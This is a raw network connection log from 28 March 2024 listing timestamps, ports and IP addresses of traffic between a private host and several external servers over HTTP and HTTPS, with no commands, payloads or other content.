Mar 28, 2024 09:15:00.240591049 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240591049 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240597963 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240622044 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240648031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240660906 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240662098 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240684986 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240691900 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240711927 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240720034 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240755081 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240767002 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240776062 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240797997 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240814924 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240823030 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240843058 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240856886 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240875959 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240895033 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240920067 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240923882 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240953922 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240961075 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.240982056 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.240999937 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241005898 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241029024 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241044044 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241063118 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241075039 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241082907 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241118908 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241121054 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241127968 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241141081 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241163969 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241183996 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241209030 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241229057 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241240025 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241276026 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241281033 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241300106 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241333961 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241400957 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241414070 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241472960 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241477966 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241481066 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241487026 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241522074 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241543055 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241548061 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241566896 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241571903 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241621971 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241655111 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241669893 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241693974 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241734982 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241741896 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241761923 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241765976 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241780043 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241801023 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241801023 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241816044 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241847038 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241858959 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241867065 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241909981 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241909981 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.241919994 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241926908 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241942883 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.241978884 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.242000103 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.242022038 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.242079020 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.242116928 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.242117882 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.242155075 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.242167950 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.242186069 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.242202997 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.242202997 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.242208004 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.242228031 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.242248058 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.242266893 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.242274046 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.242274046 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.242274046 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.242328882 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.242336035 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.242348909 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.242383003 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.242383003 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.242388010 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.242417097 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:15:00.242436886 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.242670059 CET	80	49774	93.186.225.194	192.168.2.4
Mar 28, 2024 09:15:00.242816925 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:15:00.242964983 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.243005991 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.243071079 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.243078947 CET	49774	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:15:00.243685007 CET	80	49771	93.186.225.194	192.168.2.4
Mar 28, 2024 09:15:00.243851900 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.243859053 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.244376898 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.244700909 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.244709969 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.245546103 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.245553970 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.245659113 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.246304035 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.246351004 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.247075081 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.247149944 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.247188091 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.247370958 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.247960091 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.247968912 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.248251915 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.248776913 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.248799086 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.248910904 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.249610901 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.249655962 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.249726057 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.249994040 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.250123978 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.250168085 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.250471115 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.250520945 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.250523090 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.250761032 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.252356052 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.252363920 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.252732038 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.253366947 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.253375053 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.253601074 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.254128933 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.254136086 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.254252911 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.254503965 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.254513025 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.254722118 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.254857063 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.254867077 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.255919933 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.255928040 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.255949974 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.256129980 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.256439924 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.256491899 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.257544041 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.257594109 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.257656097 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.257657051 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.258117914 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.258152962 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.258349895 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.258366108 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.258378029 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.258867979 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.258898020 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.258912086 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.259247065 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.259263039 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.259287119 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.260128021 CET	80	49770	93.186.225.194	192.168.2.4
Mar 28, 2024 09:15:00.260160923 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.260560989 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.260616064 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.260643959 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.260802031 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.261260033 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.261277914 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.261504889 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.262445927 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.263144970 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.263207912 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.263209105 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.263897896 CET	80	49775	93.186.225.194	192.168.2.4
Mar 28, 2024 09:15:00.263962030 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.263997078 CET	49775	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:15:00.264010906 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.264034986 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.264046907 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.266206026 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.266287088 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.266383886 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.267177105 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.267213106 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.268553972 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.270020008 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.270026922 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.270092010 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.270723104 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.270742893 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.270781994 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.270801067 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.270816088 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.270823002 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.270860910 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.270870924 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.271595001 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.271603107 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.272300005 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.272306919 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.272335052 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.273655891 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.273727894 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.273741961 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.273811102 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.273819923 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.273828030 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.273870945 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.274002075 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.274451971 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.274537086 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.274550915 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.274554968 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.274735928 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.275188923 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.275197029 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.275245905 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.275247097 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.276421070 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.276490927 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.276638985 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.276715994 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.276901007 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.276909113 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.276957989 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.277399063 CET	49774	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:15:00.277494907 CET	49775	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:15:00.278275013 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.278951883 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.278975964 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.279046059 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.279047012 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.280251980 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.280258894 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.281081915 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.281507969 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.281523943 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.281527996 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.281557083 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.281630993 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.281640053 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.282202005 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.282211065 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.282300949 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.283745050 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.283850908 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.283921957 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.283941984 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.283991098 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.284007072 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.284007072 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.284015894 CET	443	49769	52.216.219.33	192.168.2.4
Mar 28, 2024 09:15:00.284038067 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.284056902 CET	49769	443	192.168.2.4	52.216.219.33
Mar 28, 2024 09:15:00.284446955 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.284487963 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.284496069 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.284545898 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.284547091 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.284874916 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.284888983 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.285656929 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.286350012 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.287576914 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.287584066 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.287666082 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.287995100 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.288002968 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.289136887 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.289160967 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.289215088 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.289443016 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.289449930 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.289474964 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.289649010 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.289875984 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.290122986 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.290205956 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.290206909 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.290432930 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.291887999 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.291893959 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.291965961 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.291977882 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.291979074 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.292025089 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.292109966 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.294240952 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.294306040 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.295255899 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.296693087 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.296749115 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.296780109 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.297894955 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.299376011 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.299382925 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.299470901 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.300630093 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.300698042 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.300776958 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.301939011 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.301964998 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.304172039 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.304224968 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.304297924 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.304970980 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.305016041 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.305121899 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.305363894 CET	443	49773	45.130.41.108	192.168.2.4
Mar 28, 2024 09:15:00.305439949 CET	49773	443	192.168.2.4	45.130.41.108
Mar 28, 2024 09:15:00.305687904 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.305758953 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.306246042 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.306330919 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.306332111 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.306332111 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.306442976 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.306473017 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.306514978 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.306516886 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:15:00.307168961 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.307193995 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.307853937 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.307878971 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:15:00.307917118 CET	80	49735	5.42.66.22	192.168.2.4
